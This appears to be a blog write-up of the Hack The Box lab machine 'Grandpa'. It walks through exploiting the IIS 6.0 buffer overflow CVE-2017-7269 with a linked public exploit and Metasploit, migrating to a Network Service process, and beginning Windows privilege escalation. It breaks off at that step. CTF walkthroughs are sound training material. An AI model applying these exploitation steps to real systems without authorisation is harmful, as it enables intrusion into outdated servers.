Hack The Box — Grandpa

5 min readFeb 6, 2022

Grandpa is a Medium level difficult Windows box on Hack The Box.It is almost similar to another box named “Granny” and is also an OSCP like machine.DO NOTE that this machine cannot be solved easily without metasploit so it is suggested to solve it using metasploit.Moreover this machine can also be glitchy at times.At the end, i will cover another way to solve without metasploit as well.

ENUMERATION

We find that only port 80 is open and is running an outdated IIS server

We try to find hidden directories and even looking at the source code of the default page however we are unable to find anything useful. and we are out of ideas.

Now the only option we have is to run a service exploit.Moreover i also know that IIS 6.0 is outdated as i have faced IIS 10 in other ctfs.So lets google and surprisingly All the exploit suggestions we get is the same (CVE 2017–7269)

Its a buffer overflow exploit(Avoid using the one in exploit-db) we thankfully find one in Github which is written in python and has a very simple usage.

EXPLOIT LINK-https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell

Just run the exploit- python exploited.py and it will show the usage which is very simple.

USAGE- python exploit.py RHOST RPORT LHOST LPORT

we got a shell !! but as Network Service not SYSTEM which is the most privileged user.

NOW DO NOTE THAT THE SHELL IS VERY UNSTABLE. I wasted 1 hour here and wasn’t able to download any file using wget,certuril or even powershell.And if you refer any other writeup, Everyone else faced the same problem as well and thus we have to use metasploit in this pirticular box.

However moving on, i was able to see some interesting stuff like the Users folder was not there and instead there was a folder called Documents and Settings.

I also found that this box is vulnerable to juicy potato as both privileges are enabled.DO NOTE THAT this box can also be solved manually without using Metasploit as there is a folder called wmpub in the C:\ directory which allows read and write access.Basically this is the only folder where we can read and write. I would highly suggest you to refer to this writeup by 0xdf -https://0xdf.gitlab.io/2020/05/28/htb-grandpa.html (i you wanna solve it manually)

USING METASPLOIT

We search for the cve of the same buffer overflow exploit used before and find it immediately.

Now we run the command- “shows options” and set the options accordingly and hit “run”

And boom ! we have a shell.(If this fails, try again as metasploit can be problematic at times)

However when i try to run commands like “whoami” or “getuid”, it throws an error. This is because we are currently not running as a privileged process.

We run the command “ps” which shows all running processes and their PID(process id)

We migrate to the process wmiprvse.exe which has the PID 1936by running the command- “migrate 1936” since its owned by NT authority\Network Service and also has the correct architecture x86. (We can also migrate to w3wp or davcdata.exe if we wish to)

A we can see above, we can now Successfully run “getuid” command now.Perviously it was throwing an error.

PRIVILEGE ESCALATION

Now, in order to privilege escalate, all we need to do is run windows local exploit suggester. But first we have to background our current session by running the command “background”

Make sure to choose your correct session number and hit “run”. This will give us a list of possible exploits we can use.DO NOTE THAT we will only use the exploits saying “The target appears to be vulnerable”